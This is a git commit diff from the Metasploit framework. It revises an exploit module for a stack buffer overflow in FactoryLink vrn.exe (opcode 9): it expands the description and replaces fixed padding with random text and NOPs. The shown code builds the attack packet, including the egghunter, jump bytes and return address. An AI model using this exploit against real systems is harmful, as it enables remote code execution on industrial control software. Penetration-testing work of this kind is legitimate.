RCA, description update, and some text randomness

git-svn-id: file:///home/svn/framework3/trunk@12998 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Wei Chen 2011-06-21 21:08:57 +00:00
parent 69963a45ab
commit 0400a72ab0
1 changed files with 24 additions and 21 deletions

View File

@ -21,9 +21,11 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'FactoryLink vrn.exe Opcode 9 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2, and 8.0.1.703.
By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
Originally found and posted by Luigi Auriemma.
This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,
and 8.0.1.703. By sending a specially crafted packet, an attacker may be able to
execute arbitrary code due to the improper use of a vsprintf() function while
processing the user-supplied text field. Originally found and posted by
Luigi Auriemma.
},
'Author' =>
[
@ -64,6 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
connect
#The use of egghunter seems appropriate due to the small buffer in [ESP+8]
hunter = generate_egghunter(payload.encoded, payload_badchars,
{ :checksum => true, :startreg => 'ebp'})
@ -82,10 +85,10 @@ class Metasploit3 < Msf::Exploit::Remote
request = header
request << rand_text_alpha_upper(100)
request << egg
request << ("C" * target['padding'])
request << rand_text_alpha(target['padding'])
request << "\xeb\x06\x90\x90"
request << [target.ret].pack('V')
request << "C"*24
request << make_nops(24)
request << hunter[0]
request << rand_text_alpha_upper(100000)